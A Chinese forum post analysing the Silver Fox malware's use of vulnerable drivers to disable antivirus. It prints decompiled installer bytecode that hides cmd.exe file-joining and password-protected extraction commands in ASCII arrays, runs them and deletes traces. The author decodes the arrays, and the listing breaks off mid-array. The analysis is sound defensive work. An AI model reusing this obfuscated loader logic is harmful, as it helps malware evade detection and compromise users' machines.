- 移动版

主题：持续演进的银狐——不断增加脆弱驱动通过BYOVD结束防病毒软件

z3960发表于 2026-02-21 07:49

23], S32(108)assign Var14, Var15pop ; StackCount = 14pushvar Var6 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13pushtype WideString ; StackCount = 14assign Var14, Var4add Var14, Var5assign Var11, Var14pop ; StackCount = 13pushtype WideString ; StackCount = 14assign Var14, Var4add Var14, Var6assign Var12, Var14pop ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype Type30 ; StackCount = 15pushtype S32 ; StackCount = 16assign Var16, S32(10)pushvar Var15 ; StackCount = 17call SETARRAYLENGTHpop ; StackCount = 16pop ; StackCount = 15assign Var15[0], S32(104)assign Var15[1], S32(116)assign Var15[2], S32(76)assign Var15[3], S32(99)assign Var15[4], S32(69)assign Var15[5], S32(78)assign Var15[6], S32(121)assign Var15[7], S32(82)assign Var15[8], S32(70)assign Var15[9], S32(89)assign Var14, Var15pop ; StackCount = 14pushvar Var9 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13pushtype Type30 ; StackCount = 14pushtype Type30 ; StackCount = 15pushtype S32 ; StackCount = 16assign Var16, S32(10)pushvar Var15 ; StackCount = 17call SETARRAYLENGTHpop ; StackCount = 16pop ; StackCount = 15assign Var15[0], S32(119)assign Var15[1], S32(88)assign Var15[2], S32(115)assign Var15[3], S32(72)assign Var15[4], S32(70)assign Var15[5], S32(110)assign Var15[6], S32(85)assign Var15[7], S32(110)assign Var15[8], S32(113)assign Var15[9], S32(75)assign Var14, Var15pop ; StackCount = 14pushvar Var10 ; StackCount = 15call STRFROMCODEpop ; StackCount = 14pop ; StackCount = 13pushtype WideString ; StackCount = 14pushtype UnicodeString_2 ; StackCount = 15pushtype Type30 ; StackCount = 16pushtype Type30 ; StackCount = 17pushtype S32 ; StackCount = 18assign Var18, S32(7)pushvar Var17 ; StackCount = 19call SETARRAYLENGTHpop ; StackCount = 18pop ; StackCount = 17assign Var17[0], S32(120)assign Var17[1], S32(32)assign Var17[2], S32(45)assign Var17[3], S32(121)assign Var17[4], S32(32)assign Var17[5], S32(45)assign Var17[6], S32(112)assign Var16, Var17pop ; StackCount = 16pushvar Var15 ; StackCount = 17call STRFROMCODEpop ; StackCount = 16pop ; StackCount = 15assign Var14, Var15pop ; StackCount = 14add Var14, Var9add Var14, Var10pushtype UnicodeString_2 ; StackCount = 15pushtype Type30 ; StackCount = 16pushtype Type30 ; StackCount = 17pushtype S32 ; StackCount = 18assign Var18, S32(4)pushvar Var17 ; StackCount = 19call SETARRAYLENGTHpop ; StackCount = 18pop ; StackCount = 17assign Var17[0], S32(32)assign Var17[1], S32(45)assign Var17[2], S32(111)assign Var17[3], S32(34)assign Var16, Var17pop ; StackCount = 16pushvar Var15 ; StackCount = 17call STRFROMCODEpop ; StackCount = 16pop ; StackCount = 15add Var14, Var15pop ; StackCount = 14add Var14, Var4pushtype UnicodeString_2 ; StackCount = 15pushtype Type30 ; StackCount = 16pushtype Type30 ; StackCount = 17pushtype S32 ; StackCount = 18assign Var18, S32(3)pushvar Var17 ; StackCount = 19call SETARRAYLENGTHpop ; StackCount = 18pop ; StackCount = 17assign Var17[0], S32(34)assign Var17[1], S32(32)assign Var17[2], S32(34)assign Var16, Var17pop ; StackCount = 16pushvar Var15 ; StackCount = 17call STRFROMCODEpop ; StackCount = 16pop ; StackCount = 15add Var14, Var15pop ; StackCount = 14add Var14, Var12pushtype UnicodeString_2 ; StackCount = 15pushtype Type30 ; StackCount = 16pushtype Type30 ; StackCount = 17pushtype S32 ; StackCount = 18assign Var18, S32(1)pushvar Var17 ; StackCount = 19call SETARRAYLENGTHpop ; StackCount = 18pop ; StackCount = 17assign Var17[0], S32(34)assign Var16, Var17pop ; StackCount = 16pushvar Var15 ; StackCount = 17call STRFROMCODEpop ; StackCount = 16pop ; StackCount = 15add Var14, Var15pop ; StackCount = 14assign Var13, Var14pop ; StackCount = 13pushtype BOOLEAN ; StackCount = 14pushtype UnicodeString_2 ; StackCount = 15assign Var15, Var11pushvar Var14 ; StackCount = 16call FILEEXISTSpop ; StackCount = 15pop ; StackCount = 14jz loc_18bc, Var14pushtype BOOLEAN ; StackCount = 15pushtype UnicodeString_2 ; StackCount = 16assign Var16, Var12pushvar Var15 ; StackCount = 17call FILEEXISTSpop ; StackCount = 16pop ; StackCount = 15and Var14, Var15pop ; StackCount = 14loc_18bc:sfz Var14pop ; StackCount = 13jf loc_196dpushtype BOOLEAN ; StackCount = 14pushtype Pointer ; StackCount = 15setptr Var15, Var1pushtype U8_4 ; StackCount = 16assign Var16, U8_4(1)pushtype S32 ; StackCount = 17assign Var17, S32(0)pushtype UnicodeString_2 ; StackCount = 18assign Var18, String_3("")pushtype UnicodeString_2 ; StackCount = 19assign Var19, Var13pushtype UnicodeString_2 ; StackCount = 20assign Var20, Var11pushvar Var14 ; StackCount = 21call EXECpop ; StackCount = 20pop ; StackCount = 19pop ; StackCount = 18pop ; StackCount = 17pop ; StackCount = 16pop ; StackCount = 15pop ; StackCount = 14pop ; StackCount = 13pushtype BOOLEAN ; StackCount = 14pushtype UnicodeString_2 ; StackCount = 15assign Var15, Var12pushvar Var14 ; StackCount = 16call DELETEFILEpop ; StackCount = 15pop ; StackCount = 14pop ; StackCount = 13loc_196d:ret
其中，我们观察到大量ASCII码，例如在开头的[99, 109, 100, 46, 101, 120, 101]即对应cmd.exe：复制代码隐藏代码assign Var15[0], S32(99); 'c'assign Var15[1], S32(109); 'm'assign Var15[2], S32(100); 'd'assign Var15[3], S32(46); '.'assign Var15[4], S32(101); 'e'assign Var15[5], S32(120); 'x'assign Var15[6], S32(101); 'e'
在该函数中包含多个ASCII码数组，用于构建字符串并执行命令。字符串通过数组编码（如[67, 58, 92, ...]对应ASCII码，解码后为C:...），增加反分析难度。
以下是所有数组的ASCII码还原结果及其对应的字符串：
第一个数组（7字节）ASCII码：99, 109, 100, 46, 101, 120, 101字符串："cmd.exe"
第二个数组（137字节）ASCII码：47, 99, 32, 99, 111, 112, 121, 32, 47, 98, 32, 47, 121, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 109, 97, 105, 110, 46, 49, 34, 32, 43, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 10

回帖(7)：

7 ^# hanxiao129
02-22 20:31

看来很不错的

6 ^# hanxiao129
02-22 20:30

不错的银狐

5 ^# hanxiao129
02-22 20:30

感谢楼主分享

4 ^# huwg
02-21 16:56

谢谢分享

3 ^# huwg
02-21 16:56

了解一下

2 ^# huwg
02-21 16:56

来看看看

1 ^# z3960
02-21 07:50

该函数会检测360主防进程——若存在，则执行断网，具体如下：该函数会调用代码中的“IS360PROCES ..

全部回帖(7)»